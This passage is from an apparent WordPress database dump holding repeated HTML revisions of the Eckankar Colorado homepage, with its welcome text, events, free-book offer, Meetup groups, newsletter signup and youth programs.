dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(237047,40284,'post_new_post_content','\r\n<div style=\"height: 150px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\" ><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(237046,40284,'post_prev_post_content','\r\n\r\n<div style=\"height: 150px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\" ><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -274px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 